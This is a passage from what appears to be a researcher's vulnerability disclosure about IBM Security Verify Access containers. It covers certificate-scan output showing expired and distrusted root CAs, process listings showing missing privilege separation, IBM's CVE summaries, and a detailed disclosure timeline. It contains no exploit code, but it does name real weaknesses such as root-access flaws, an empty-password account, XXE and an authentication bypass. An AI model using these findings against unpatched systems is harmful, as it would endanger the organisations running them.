 expires soon ( expires on 2023-03-03T12:09:48Z, 18 weeks 4 days until expiry)

Certificate CN=GlobalSign,OU=GlobalSign Root CA - R2,O=GlobalSign
 expired ( expired on 2021-12-15T08:00:00Z, 44 weeks 5 days since expiry)
 removed from Mozilla trust store, comments: Ownership transferred to GTS:
https://bug1325532.bmoattachments.org/attachment.cgi?id=8844281

Certificate CN=Hellenic Academic and Research Institutions RootCA 2011,O=Hellenic Academic and Research Institutions Cert. Authority,C=GR
 removed from Mozilla trust store, no reason given

Certificate CN=Staat der Nederlanden EV Root CA,O=Staat der Nederlanden,C=NL
 expires soon ( expires on 2022-12-08T11:10:28Z, 6 weeks 3 days until expiry)

Certificate CN=Global Chambersign Root,OU=http://www.chambersign.org,O=AC Camerfirma SA CIF A82743287,C=EU
 removed from Mozilla trust store, comments: Websites trust bit turned off in NSS 3.35, Firefox 59
https://bugzilla.mozilla.org/show_bug.cgi?id=1410277

Certificate CN=GlobalSign,OU=GlobalSign Root CA - R2,O=GlobalSign
 expired ( expired on 2021-12-15T08:00:00Z, 44 weeks 5 days since expiry)
 removed from Mozilla trust store, comments: Ownership transferred to GTS:
https://bug1325532.bmoattachments.org/attachment.cgi?id=8844281

Certificate CN=Hellenic Academic and Research Institutions RootCA 2011,O=Hellenic Academic and Research Institutions Cert. Authority,C=GR
 removed from Mozilla trust store, no reason given

Certificate CN=Global Chambersign Root,OU=http://www.chambersign.org,O=AC Camerfirma SA CIF A82743287,C=EU
 removed from Mozilla trust store, comments: Websites trust bit turned off in NSS 3.35, Firefox 59
https://bugzilla.mozilla.org/show_bug.cgi?id=1410277

Certificate CN=Cybertrust Global Root,O=Cybertrust\, Inc
 expired ( expired on 2021-12-15T08:00:00Z, 44 weeks 5 days since expiry)
 removed from Mozilla trust store, comments: June 2015: DigiCert acquired this root cert from Verizon. 

Certificate CN=DST Root CA X3,O=Digital Signature Trust Co. 
 expired ( expired on 2021-09-30T14:01:15Z, 1 year 3 weeks since expiry)
 removed from Mozilla trust store, no reason given

Certificate CN=E-Tugra Certification Authority,OU=E-Tugra Sertifikasyon Merkezi,O=E-Tua EBG Bilim Teknolojileri ve Hizmetleri A.,L=Ankara,C=TR
 expires soon ( expires on 2023-03-03T12:09:48Z, 18 weeks 4 days until expiry)

Certificate CN=DigiNotar PKIoverheid CA Organisatie - G2,O=DigiNotar B.V.,C=NL
 expired ( expired on 2020-03-23T09:50:05Z, 2 years 30 weeks since expiry)

Certificate CN=GlobalSign,OU=GlobalSign Root CA - R2,O=GlobalSign
 expired ( expired on 2021-12-15T08:00:00Z, 44 weeks 5 days since expiry)
 removed from Mozilla trust store, comments: Ownership transferred to GTS:
https://bug1325532.bmoattachments.org/attachment.cgi?id=8844281

Certificate CN=Hellenic Academic and Research Institutions RootCA 2011,O=Hellenic Academic and Research Institutions Cert. Authority,C=GR
 removed from Mozilla trust store, no reason given

Certificate CN=Staat der Nederlanden EV Root CA,O=Staat der Nederlanden,C=NL
 expires soon ( expires on 2022-12-08T11:10:28Z, 6 weeks 3 days until expiry)

Certificate CN=sks-keyservers.net CA,O=sks-keyservers.net CA,ST=Oslo,C=NO
 expired ( expired on 2022-10-07T00:33:37Z, 2 weeks 3 days since expiry)

Found 395 certificates total, of which 21 had issues

Results for:

    • ibmcom/verify-access-runtime:10.0.4.0
    • ibmcom/verify-access-wrp:10.0.4.0
    • ibmcom/verify-access-dsc:10.0.4.0
kali-docker# paranoia inspect ibmcom/verify-access-runtime:10.0.4.0
Certificate CN=Cybertrust Global Root,O=Cybertrust\, Inc
expired ( expired on 2021-12-15T08:00:00Z, 44 weeks 5 days since expiry)
 removed from Mozilla trust store, comments: June 2015: DigiCert acquired this root cert from Verizon. 

Certificate CN=DST Root CA X3,O=Digital Signature Trust Co. 
expired ( expired on 2021-09-30T14:01:15Z, 1 year 3 weeks since expiry)
 removed from Mozilla trust store, no reason given

Certificate CN=E-Tugra Certification Authority,OU=E-Tugra Sertifikasyon Merkezi,O=E-Tua EBG Bilim Teknolojileri ve Hizmetleri A.,L=Ankara,C=TR
 expires soon ( expires on 2023-03-03T12:09:48Z, 18 weeks 4 days until expiry)

Certificate CN=GlobalSign,OU=GlobalSign Root CA - R2,O=GlobalSign
expired ( expired on 2021-12-15T08:00:00Z, 44 weeks 5 days since expiry)
 removed from Mozilla trust store, comments: Ownership transferred to GTS:
https://bug1325532.bmoattachments.org/attachment.cgi?id=8844281

Certificate CN=Hellenic Academic and Research Institutions RootCA 2011,O=Hellenic Academic and Research Institutions Cert. Authority,C=GR
 removed from Mozilla trust store, no reason given

Certificate CN=Staat der Nederlanden EV Root CA,O=Staat der Nederlanden,C=NL
 expires soon ( expires on 2022-12-08T11:10:28Z, 6 weeks 3 days until expiry)

Certificate CN=Global Chambersign Root,OU=http://www.chambersign.org,O=AC Camerfirma SA CIF A82743287,C=EU
 removed from Mozilla trust store, comments: Websites trust bit turned off in NSS 3.35, Firefox 59

https://bugzilla.mozilla.org/show_bug.cgi?id=1410277
Certificate CN=GlobalSign,OU=GlobalSign Root CA - R2,O=GlobalSign
expired ( expired on 2021-12-15T08:00:00Z, 44 weeks 5 days since expiry)
 removed from Mozilla trust store, comments: Ownership transferred to GTS:
https://bug1325532.bmoattachments.org/attachment.cgi?id=8844281

Certificate CN=Hellenic Academic and Research Institutions RootCA 2011,O=Hellenic Academic and Research Institutions Cert. Authority,C=GR
 removed from Mozilla trust store, no reason given

Certificate CN=Global Chambersign Root,OU=http://www.chambersign.org,O=AC Camerfirma SA CIF A82743287,C=EU
 removed from Mozilla trust store, comments: Websites trust bit turned off in NSS 3.35, Firefox 59

https://bugzilla.mozilla.org/show_bug.cgi?id=1410277
Certificate CN=Cybertrust Global Root,O=Cybertrust\, Inc
expired ( expired on 2021-12-15T08:00:00Z, 44 weeks 5 days since expiry)
 removed from Mozilla trust store, comments: June 2015: DigiCert acquired this root cert from Verizon. 

Certificate CN=DST Root CA X3,O=Digital Signature Trust Co. 
expired ( expired on 2021-09-30T14:01:15Z, 1 year 3 weeks since expiry)
 removed from Mozilla trust store, no reason given

Certificate CN=E-Tugra Certification Authority,OU=E-Tugra Sertifikasyon Merkezi,O=E-Tua EBG Bilim Teknolojileri ve Hizmetleri A.,L=Ankara,C=TR
 expires soon ( expires on 2023-03-03T12:09:48Z, 18 weeks 4 days until expiry)

Certificate CN=DigiNotar PKIoverheid CA Organisatie - G2,O=DigiNotar B.V.,C=NL
 expired ( expired on 2020-03-23T09:50:05Z, 2 years 30 weeks since expiry)

Certificate CN=GlobalSign,OU=GlobalSign Root CA - R2,O=GlobalSign
expired ( expired on 2021-12-15T08:00:00Z, 44 weeks 5 days since expiry)
 removed from Mozilla trust store, comments: Ownership transferred to GTS:
https://bug1325532.bmoattachments.org/attachment.cgi?id=8844281

Certificate CN=Hellenic Academic and Research Institutions RootCA 2011,O=Hellenic Academic and Research Institutions Cert. Authority,C=GR
 removed from Mozilla trust store, no reason given

Certificate CN=Staat der Nederlanden EV Root CA,O=Staat der Nederlanden,C=NL
 expires soon ( expires on 2022-12-08T11:10:28Z, 6 weeks 3 days until expiry)

Certificate CN=sks-keyservers.net CA,O=sks-keyservers.net CA,ST=Oslo,C=NO
 expired ( expired on 2022-10-07T00:33:37Z, 2 weeks 3 days since expiry)

Found 374 certificates total, of which 18 had issues

The communications used in the ISVA platform use SSL/TLS with a trust entirely based on underlying CAs. Some CAs have been revoked and cannot be trusted anymore.

The presence of revoked and expired CAs also shows that the security of the Docker images is highly perfectible.

Details - Lack of privilege separation in Docker instances

It was observed that the Docker images do not implement privilege separation. Privilege separation is a software-based implementation of the principle of least privilege.

Using dynamic analysis, the ibmcom/verify-access-wrp:10.0.4.0 Docker image, ibmcom/verify-access:10.0.4.0 Docker image, and the ibmcom/verify-access-runtime Docker image do not correctly implement privilege separation.

Processes running inside the ibmcom/verify-access:10.0.4.0 Docker image:

USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
isam           1  0.0  0.0  12060  2812 ?        Ss   Oct21   0:00 /bin/sh /sbin/bootstrap.sh
isam         312  0.0  0.0  24532    56 ?        Ss   Oct21   0:00 /usr/sbin/mesa_crashd
isam         314  0.1  0.0  24568  2056 ?        R    Oct21   6:20 /usr/sbin/mesa_crashd
isam         318  0.0  0.0  69160  2732 ?        Ss   Oct21   0:00 /usr/sbin/mesa_syslogd
isam         322  0.0  0.0  69224  2164 ?        S    Oct21   0:02 /usr/sbin/mesa_syslogd
isam         399  0.0  0.0 102760  2740 ?        Ss   Oct21   0:00 /usr/sbin/mesa_eventsd -m 1000
isam         400  0.0  0.1 711216  8276 ?        Sl   Oct21   0:00 /usr/sbin/mesa_eventsd -m 1000
isam         747  0.0  0.0 270992  7452 ?        Ssl  Oct21   0:06 /usr/sbin/wga_watchdogd slapdw -log_file /var/application.logs.local/verify_access_runtime/user_registry/msg__user_registry.log /usr/sbin/slapd -d 0 -s 0 -h ldap://127.0.0.1:389 ldaps://127.0.0.1:636 -f /etc/openldap/slapd.conf -u ldap -g ldap 
isam         756  0.0  0.0 271124  7308 ?        Ssl  Oct21   0:06 /usr/sbin/wga_watchdogd ISAM-Policy-Server -log_file /var/application.logs.local/verify_access_runtime/policy/msg__pdmgrd.log -cfg /var/PolicyDirector/etc/ivmgrd.conf /opt/PolicyDirector/bin/pdmgrd -foreground
isam         807  0.0  0.0  71488  3084 ?        Ss   Oct21   0:00 /usr/sbin/iss-lum
isam         808  0.0  0.5 343920 42140 ?        Sl   Oct21   0:00 /usr/sbin/iss-lum
isam         833  0.0  0.0 128400  5140 ?        Ssl  Oct21   0:00 /usr/sbin/rsyslogd
isam         873  0.0  0.0 273920  7080 ?        Ssl  Oct21   0:06 /usr/sbin/wga_watchdogd wga_notifications -log_file /var/log/wga_notifications.log wga_notifications -foreground
isam         879  1.5  0.5 563872 42292 ?        Sl   Oct21  71:40 wga_notifications -foreground
isam         892  0.0  0.0  12060  1804 ?        S    Oct21   0:00 /bin/sh /sbin/bootstrap.sh
isam         895  0.0  0.0  23068  1256 ?        S    Oct21   0:00 /usr/bin/coreutils --coreutils-prog-shebang=tail /usr/bin/tail -F -n+0 /var/application.logs.local/lmi/messages.log
isam      573957  0.0  0.0  47620  3696 pts/0    Rs+  16:53   0:00 ps -aux
isam      573963  0.0  0.0  11928  2852 ?        S    16:53   0:00 sh -c ls /var/support/core_*.* | wc -l

pgresql      434  0.0  0.2 188380 17492 ?        Ss   Oct21   0:06 /usr/bin/postgres -D /var/postgresql/config/data
pgresql      435  0.0  0.0 138892  2960 ?        Ss   Oct21   0:00 postgres: logger
pgresql      446  0.0  0.0 188380  2696 ?        Ss   Oct21   0:00 postgres: checkpointer
pgresql      447  0.0  0.0 188516  4676 ?        Ss   Oct21   0:03 postgres: background writer
pgresql      448  0.0  0.0 188380  5148 ?        Ss   Oct21   0:03 postgres: walwriter
pgresql      449  0.0  0.0 189112  5312 ?        Ss   Oct21   0:04 postgres: autovacuum launcher
pgresql      450  0.0  0.0 139024  3016 ?        Ss   Oct21   0:15 postgres: stats collector
pgresql      451  0.0  0.0 188916  5492 ?        Ss   Oct21   0:00 postgres: logical replication launcher

www-data     547  0.3  6.2 4925056 499744 ?      SLl  Oct21  18:57 /opt/java/jre/bin/java -javaagent:/opt/IBM/wlp/bin/tools/ws-javaagent.jar -Djava.awt.headless=true -Djdk.attach.allowAttachSelf=true -Dcom.sun.jndi.ldap.object.disableEndpointIdentification=true -Djava.security.properties=/opt/IBM/wlp/usr/servers/de

ivmgr        761  0.0  0.5 873712 44896 ?        Sl   Oct21   0:04 /opt/PolicyDirector/bin/pdmgrd -foreground
ivmgr        863  0.0  0.1 276544  8440 ?        Sl   Oct21   0:00 /usr/sbin/wga_servertaskd

ldap         752  0.0 10.3 1314228 822572 ?      Sl   Oct21   0:00 /usr/sbin/slapd -d 0 -s 0 -h ldap://127.0.0.1:389 ldaps://127.0.0.1:636 -f /etc/openldap/slapd.conf -u ldap -g ldap

root         813  0.0  0.0  41984  3528 ?        Ss   Oct21   0:01 /usr/sbin/crond
root         862  0.0  0.0 174348  2828 ?        Ss   Oct21   0:00 /usr/sbin/wga_servertaskd

Some processes are running as isam. For example, the rsyslogd processys runs as isam. If a program running as isam is compromised inside an instance, then all the programs running as isam are also compromised.

Processes running inside the ibmcom/verify-access-wrp:10.0.4.0 Docker image:

PID   USER     TIME  COMMAND
    1 isam      9:42 /opt/pdweb/bin/webseald -foreground -noenv -config etc/webseald-login-internal.conf
   32 isam      0:02 slapd -4 -f /etc/openldap/slapd.conf -h ldap://127.0.0.1:6389 -s 0

The only 2 processes are running as isam.

Processes running inside the ibmcom/verify-access-runtime: 10.0.4.0 Docker image:

PID   USER     TIME  COMMAND
    1 isam      1h18 /opt/java/jre/bin/java -javaagent:/opt/ibm/wlp/bin/tools/ws-javaagent.jar -Djava.awt.headless=true -Djdk.attach.allowAttachSelf=true -Dcom.ibm.ws.logging.log.directory=/var/application.logs.local/rtprofile -Xms512m -Xmx2048m -Dcom.sun.security.enableCRLDP=true -Dsun.net.inetaddr.ttl=30 -Dhttps
   38 isam      0:00 slapd -4 -f /etc/openldap/slapd.conf -h ldap://127.0.0.1:6389 -s 0
   63 isam      0:04 /usr/bin/postgres -D /var/postgresql/config/data
   64 isam      0:00 postgres: logger   
   66 isam      0:00 postgres: checkpointer   
   67 isam      0:00 postgres: background writer   
   68 isam      0:00 postgres: walwriter   
   69 isam      0:01 postgres: autovacuum launcher   
   70 isam      0:05 postgres: stats collector   
   71 isam      0:00 postgres: logical replication launcher   
37169 isam      0:00 bash
37186 isam      0:00 ps -a

In the ibmcom/verify-access-runtime instance, we can confirm the postgres daemon is running. We can also confirm a complete lack of privilege separation: everything is running as isam.

If a program running as isam is compromised inside an instance, then the all the programs running as isam are also compromised.

Vendor Response

IBM provided several security bulletins:

Security Bulletin: IBM Security Verify Access is vulnerable to multiple Security Vulnerabilities - https://www.ibm.com/support/pages/node/7158790:

    • CVE-2023-38371: IBM Security Access Manager uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information.
    • CVE-2024-35137: IBM Security Access Manager Appliance could allow a local user to possibly elevate their privileges due to sensitive configuration information being exposed.
    • CVE-2024-35139: IBM Security Verify Access could allow a local user to obtain sensitive information from the container due to incorrect default permissions.
    • CVE-2023-30998: IBM Security Access Manager Container could allow a local user to obtain root access due to improper access controls.
    • CVE-2023-30997: IBM Security Access Manager Container could allow a local user to obtain root access due to improper access controls.
    • CVE-2023-38368: IBM Security Access Manager Container could disclose sensitive information to a local user to do improper permission controls.
    • CVE-2023-38370: IBM Security Access Manager Container, under certain configurations, could allow a user on the network to install malicious packages.

Security Bulletin: Security Vulnerabilities discovered in IBM Security Verify Access - https://www.ibm.com/support/pages/node/7145400:

    • CVE-2024-25027: IBM Security Verify Access could disclose sensitive snapshot information due to missing encryption.

Security Bulletin: Multiple Security Vulnerabilities were identified in IBM Security Verify Access - https://www.ibm.com/support/pages/node/7106586:

    • CVE-2023-31003: IBM Security Access Manager Container (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.6.1) could allow a local user to obtain root access due to improper access controls.
    • CVE-2023-31001: IBM Security Access Manager Container (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.6.1) temporarily stores sensitive information in files that could be accessed by a local user.
    • CVE-2023-38267: IBM Security Access Manager Appliance (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.6.1) could allow a local user to obtain sensitive configuration information.
    • CVE-2023-31005: IBM Security Access Manager Container (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.0.0 through 10.0.6.1) could allow a local user to escalate their privileges due to an improper security configuration.
    • CVE-2023-30999: IBM Security Access Manager Container (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.0.0 through 10.0.6.1) could allow an attacker to cause a denial of service due to uncontrolled resource consumption.
    • CVE-2023-43016: IBM Security Access Manager Container (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.0.0 through 10.0.6.1) could allow a remote user to log into the server due to a user account with an empty password.
    • CVE-2023-32327: IBM Security Access Manager Container (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.0.0 through 10.0.6.1) is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources.
    • CVE-2023-32329: IBM Security Access Manager Container (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.0.0 through 10.0.6.1) could allow a user to download files from an incorrect repository due to improper file validation.
    • CVE-2023-31004: IBM Security Access Manager Container (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.0.0 through 10.0.6.1) could allow a remote attacker to gain access to the underlying system using man in the middle techniques.
    • CVE-2023-31006: IBM Security Access Manager Container (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.0.0 through 10.0.6.1) is vulnerable to a denial of service attacks on the DSC server.
    • CVE-2023-32328: IBM Security Verify Access 10.0.0.0 through 10.0.6.1 uses insecure protocols in some instances that could allow an attacker on the network to take control of the server.
    • CVE-2023-32330: IBM Security Verify Access 10.0.0.0 through 10.0.6.1 uses insecure calls that could allow an attacker on the network to take control of the server.
    • CVE-2023-43017: IBM Security Verify Access 10.0.0.0 through 10.0.6.1 could allow a privileged user to install a configuration file that could allow remote access.
    • CVE-2023-31002: IBM Security Access Manager Container 10.0.0.0 through 10.0.6.1 temporarily stores sensitive information in files that could be accessed by a local user.
    • CVE-2023-38369: IBM Security Access Manager Container 10.0.0.0 through 10.0.6.1 does not require that docker images should have strong passwords by default, which makes it easier for attackers to compromise user accounts.

Security Bulletin: Multiple Security Vulnerabilities were discovered in IBM Security Verify Access Container (CVE-2024-35140, CVE-2024-35141, CVE-2024-35142) - https://www.ibm.com/support/pages/node/7155356:

    • CVE-2024-35140: IBM Security Verify Access could allow a local user to escalate their privileges due to improper certificate validation.
    • CVE-2024-35141: IBM Security Verify Access could allow a local user to escalate their privileges due to execution of unnecessary privileges.
    • CVE-2024-35142: IBM Security Verify Access could allow a local user to escalate their privileges due to execution of unnecessary privileges.

Report Timeline

  • October 2022: Security assessment performed on IBM Security Verify Access.
  • Feb 12, 2023: A complete report was sent to IBM.
  • Feb 13, 2023: IBM acknowledged the reception of the security assessment and said that scan tools usually report a lot of issues so I have to check the status of detected CVEs by browsing RedHat webpages and create an issue for each CVE.
  • Feb 13, 2023: Replied to IBM saying that the security assessment was not done using a scanner.
  • Feb 14, 2023: Asked for an update.
  • Feb 14, 2023: IBM confirmed that the report was shared with L3 and "IBM hacking team".
  • Feb 22, 2023: IBM said they were still assessing the report.
  • Mar 13, 2023: An additional report on ibmsecurity was sent to IBM.
  • Mar 13, 2023: IBM confirmed that the second report was shared with L3 team.
  • Mar 15, 2023: IBM wanted to organize a meeting about the findings.
  • Mar 15, 2023: I replied that I would like to have a written feedback for each reported vulnerability in order to have constructive discussion.
  • Apr 4, 2023: I asked again IBM to confirm the vulnerabilities
  • Apr 5, 2023: IBM shared the analysis (VulnerabilityResponse.xlsx), confirming several vulnerabilities.
  • Apr 11, 2023: I provided my comments (VulnerabilityResponse-comments-Pierre.xlsx) and asked to organize a meeting.
  • Apr 11, 2023: IBM confirmed a meeting is possible.
  • Apr 18, 2023: I asked to organize a meeting on Apr 19, 2023.
  • Apr 18, 2023: IBM confirmed a meeting is possible.
  • Apr 19, 2023: I asked to have a meeting where every party (dev team, support and myself) can be present.
  • Apr 19, 2023: IBM confirmed a meeting would take place on Apr 20, 2023.
  • Apr 20, 2023: Meeting with IBM regarding ISVA. IBM confirmed they would recheck some of the issues and would provide CVEs for the vulnerabilities.
  • Apr 23, 2023: I asked to have a second meeting about ibmsecurity.
  • Apr 23, 2023: IBM confirmed they will organize a meeting on ibmsecurity.
  • Apr 24, 2023: I asked the timeline to get security patches.
  • Apr 24, 2023: IBM confirmed there are no ETA to get security patches.
  • Apr 27, 2023: Meeting with IBM regarding ibmsecurity. IBM confirmed they will fix all the issues.
  • May 10, 2023: I asked for CVE identifiers to track the vulnerabilities.
  • May 11, 2023: IBM said that PSIRT records have been opened and the scoring is in progress.
  • May 15, 2023: I reached IBM because I found a CVE (CVE-2023-25927) and a security bulletin likely corresponding to a vulnerability I reported, thanks to @CVEnew on Twitter: https://www.ibm.com/support/pages/node/6989653. I asked if this was one of the reported vulnerabilities.
  • Jul 7, 2023: IBM said the dev team was still working on the final list of issues and that everything would be fixed in the 10.0.7 release.
  • Jul 10, 2023: I asked when the 10.0.7 release would be available. I asked again more details about the previous advisory.
  • Jul 11, 2023: IBM said that the 10.0.7 release would be published on Dec 23, 2023. Regarding the CVEs, IBM replied they would need to discuss with the dev team.
  • Jul 12, 2023: I asked IBM to confirm if CVE-2023-25927 was one of the reported vulnerabilities.
  • Jul 12, 2023: IBM said that they do not credit security researchers.
  • Jul 13, 2023: I provided several IBM security bulletins where security researchers were credited, e.g. https://www.ibm.com/support/pages/security-bulletin-vulnerabilities-exist-ibm-data-risk-manager-cve-2020-4427-cve-2020-4428-cve-2020-4429-and-cve-2020-4430.
  • Jul 14, 2023: IBM confirmed that they would forward the information to L3 team and asked what I would want to do with this case.
  • Jul 14, 2023: I said that (1) I was still waiting for information about CVE-2023-25927, (2) I did not have any information regarding security patches for ibmsecurity and (3) I asked IBM to provide me with the final list of vulnerabilities that would be patched in the 10.0.7. Since the list of confirmed vulnerabilities was quite long, I wanted to confirm that nothing was missed.
  • Jul 28, 2023: IBM said that they did not know if CVE-2023-25927 is one of the reported vulnerabilities and in any case, it is impossible to edit the security bulletin and give credits.
  • Aug 16, 2023: IBM asked if additional assistance was required [NB: IBM likely wanted to close this ticket while no security patches were published].
  • Aug 17, 2023: I asked again information about ibmsecurity and CVE-2023-25927.
  • Oct 20, 2023: IBM said they were still analysing the requests (final list of patched vulnerabilties, security patches of ibmsecurity and status of CVE-2023-25927).
  • Oct 25, 2023: IBM asked to organize a meeting.
  • Oct 25, 2023: I replied that I was still waiting for the final list of vulnerabilities that would be fixed in version 10.0.7. There was also no information regarding security patches for ibmsecurity.
  • Oct 25, 2023: IBM replied they wanted to discuss about the vulnerabilities in a meeting.
  • Oct 29, 2023: IBM asked to organize a meeting again.
  • Oct 30, 2023: I accepted the meeting and I asked IBM to provide the list of vulnerabilities that would be patched with their current status. I also asked the status of ibmsecurity.
  • Oct 30, 2023: IBM asked to have a meeting on Nov 7, 2023.
  • Nov 2, 2023: I confirmed my presence to the meeting.
  • Nov 5, 2023: IBM confirmed the meeting.
  • Nov 7, 2023: Meeting with IBM. IBM provided me with a new report containing new feedbacks for several vulnerabilities. Also IBM confirmed that several vulnerabilities would be patched in 2024 and ibmsecurity would be patched in December 2023. IBM asked me to review a specific vulnerability that appears to be invalid (V-[REDACTED] - Insecure SSLv3 connections to the DSC servers).
  • Nov 21, 2023: IBM asked me to review the new report shared by IBM.
  • Nov 28, 2023: IBM asked for updates.
  • Dec 4, 2023: I answered that I did not have anymore access to the test infrastructure and IBM had to wait for my analysis until I get again access to the test infrastructure.
  • Dec 4, 2023: IBM asked me to check the vulnerabilities as soon as possible.
  • Dec 21, 2023: I got access to a test infrastructure and reviewed some vulnerabilities.
  • Dec 21, 2023: I sent a new analysis to IBM, containing details of 4 vulnerabilities.
  • Dec 27, 2023: IBM confirmed the reception of the new analysis.
  • Jan 15, 2024: IBM asked me to update ISVA and recheck all the vulnerabilities.
  • Jan 16, 2024: I asked IBM if ibmsecurity was also patched.
  • Jan 16, 2024: IBM confirmed that a new case must be opened for ibmsecurity to get security patches(!).
  • Jan 22, 2024: IBM wanted to organize a new meeting.
  • Jan 22, 2024: I replied that I failed to understand the issue with the ibmsecurity library and that I had a written confirmation by IBM that security patches would be provided. The vulnerabilities found in ibmsecurity were reported in March 2023 (10 months ago).
  • Jan 22, 2024: I informed IBM that I discovered(!) a new security bulletin thanks to @CVEnew: https://www.ibm.com/support/pages/node/7106586, but only 15 vulnerabilities were listed instead of the 35 vulnerabilities confirmed by IBM. I asked IBM to clarify the situation as it looked like less than half of vulnerabilities were indeed patched.
  • Jan 24, 2024: IBM created a new case for ibmsecurity.
  • Jan 29, 2024: IBM confirmed that 5 vulnerabilities had not been patched in the latest version (10.0.7).
  • Jan 29, 2024: I reached IBM to get the status of 15 unpatched vulnerabilities. I provided the updated analysis to IBM.
  • Feb 7, 2024: IBM confirmed that some of the vulnerabilities were "being processed" and that some of vulnerabilities had been also silently patched and no security bulletins had been published.
  • Feb 20, 2024: IBM asked for updates.
  • Feb 20, 2024: I asked when would be the release date for ISVA 10.0.8 and the complete list of vulnerabilities that would be patched in this release.
  • Feb 20, 2024: IBM confirmed that the 10.0.8 release would be published in mid-2024.
  • Feb 23, 2024: I sent a new vulnerability to IBM "Authentication Bypass on IBM Security Verify Runtime".
  • Feb 23, 2024: IBM confirmed the reception of the vulnerability and asked to close the ticket.
  • Feb 23, 2024: I said that since some vulnerabilities had not been patched, the ticket must stay open.
  • Feb 23, 2024: IBM said that they cannot keep the ticket open and they needed to close it.
  • Feb 23, 2024: I explained that the vulnerabilities were reported over a year ago and IBM confirmed they had not fully fixed in the latest version and that some vulnerabilities were also still under evaluation. I said that I would agree to close this ticket if IBM could confirm that all vulnerabilities reported in the ticket had been correctly fixed in the latest version. I also asked IBM to provide the corresponding security bulletins.
  • Feb 27, 2024: Regarding the authentication bypass, IBM replied that the runtime was supposed to be in the intranet zone.
  • Feb 28, 2024: I asked IBM to clarify where in the documentation specified that the runtime should not be exposed. For example, in https://www.ibm.com/docs/en/sva/10.0.7?topic=support-docker-image-verify-access-runtime, it was not explained that exposing this runtime on the network was a high security risk.
  • Mar 4, 2024: Regarding the vulnerabilities found in ibmsecurity, IBM said that any security vulnerability found in ibmsecurity must be reported by opening an issue in the Github repository.
  • Mar 8, 2024: IBM confirmed they were able to reproduce the authentication bypass vulnerability.
  • Mar 12, 2024: IBM confirmed they would add an optional MTLS authentication in the next release (10.0.8) and they would update the ISVA documentation to block any attempt of the authentication bypass vulnerability.
  • Mar 29, 2024: IBM published a new security bulletin: https://www.ibm.com/support/pages/node/7145400.
  • Mar 29, 2024: IBM confirmed that any security vulnerability found in ibmsecurity must be reported by opening an issue in the Github repository.
  • Apr 1, 2024: Creation of https://github.com/IBM-Security/ibmsecurity/issues/416.
  • Apr 2, 2024: IBM confirmed the reception of the report https://github.com/IBM-Security/ibmsecurity/issues/416#issuecomment-2032110397.
  • Apr 3, 2024: https://github.com/IBM-Security/ibmsecurity/issues/416 was entirely redacted by IBM.
  • Apr 5, 2024: I asked if the vulnerabilities would be patched in the #416 issue (https://github.com/IBM-Security/ibmsecurity/issues/416).
  • Apr 6, 2024: Issue #416 (https://github.com/IBM-Security/ibmsecurity/issues/416) closed.
  • Apr 6, 2024: I added again the content of https://github.com/IBM-Security/ibmsecurity/issues/416 and asked if CVEs would be published.
  • Apr 10, 2024: Security bulletin for ibm security published: https://www.ibm.com/support/pages/node/7147932.
  • Apr 10, 2024: I reached IBM regarding a new security bulletin, with a potential vulnerability I reported https://www.ibm.com/support/pages/node/7145828.
  • Apr 10, 2024: IBM said this security bulletin was unrelated to the vulnerabilities I reported.
  • Apr 15, 2024: IBM confirmed that the final vulnerabilities would be fixed in ISVA 10.0.8.
  • Apr 15, 2024: I provided a list of unfixed vulnerabilities and asked for more information.
  • Apr 16, 2024: IBM confirmed that all the unfixed vulnerabilities would be fixed in ISVA 10.0.8 and asked to close the ticket.
  • Apr 16, 2024: I confirmed that this ticket can be closed only when the security patches are available.
  • Apr 16, 2024: IBM confirmed they wanted to close the ticket because nothing would be updated before mid-2024.
  • Apr 17, 2024: I replied that "It makes no sense to close this ticket until the vulnerabilities have been fixed. The fact that the vulnerabilities are fixed mid-year is a decision made by IBM. IBM was made aware of these vulnerabilities over a year ago, and yet we are still waiting for security patches. If this ticket is closed, I would consider that the vulnerabilities have been fixed and it is perfectly fine to publish the technical analysis."
  • May 6, 2024: IBM closed the existing ticket and opened new tickets for the remaining vulnerabilities.
  • May 6, 2024: I contacted IBM PSIRT asking if it was fine to publish the vulnerabilities since the ticket was closed by IBM.
  • May 7, 2024: I reopened the ticket stating that some of the patched vulnerabilities did not receive a CVE and there were also some unpatched vulnerabilities. I asked IBM to provide me with the CVE assigned to each vulnerability. I also asked IBM to confirm that, since this ticket had been closed by IBM, all the vulnerabilities had been fixed and that I would be able to publish the technical details.
  • May 8, 2024: IBM said they would review the list of vulnerabilities.
  • May 10, 2024: IBM PSIRT asked me not to publish technical details of unpatched vulnerabilities.
  • May 17, 2024: IBM provided me with an incomplete list of CVEs, with different vulnerabilities under the same CVE identifier and asked to close the ticket.
  • May 20, 2024: IBM asked for my comments on the list of CVEs.
  • May 20, 2024: I confirmed that several CVEs were missing and the list was incomplete.
  • May 21, 2024: IBM provided me with an explanation regarding the missing CVEs.
  • May 21, 2024: I asked IBM to quote their explanation in the security advisory.
  • May 21, 2024: IBM asked to have a meeting.
  • May 22, 2024: I replied that I would prefer written communication since it was very difficult to track the status of the vulnerabilities with (1) CVEs obtained only several months after the release of security bulletins, (2) tickets closed by IBM for unpatched vulnerabilities, (3) vulnerabilities in ibmsecurity which could be corrected by IBM and which could then no longer be managed by IBM, and (4) missing CVEs.
  • May 22, 2024: IBM asked to have a meeting to remove any confusion.
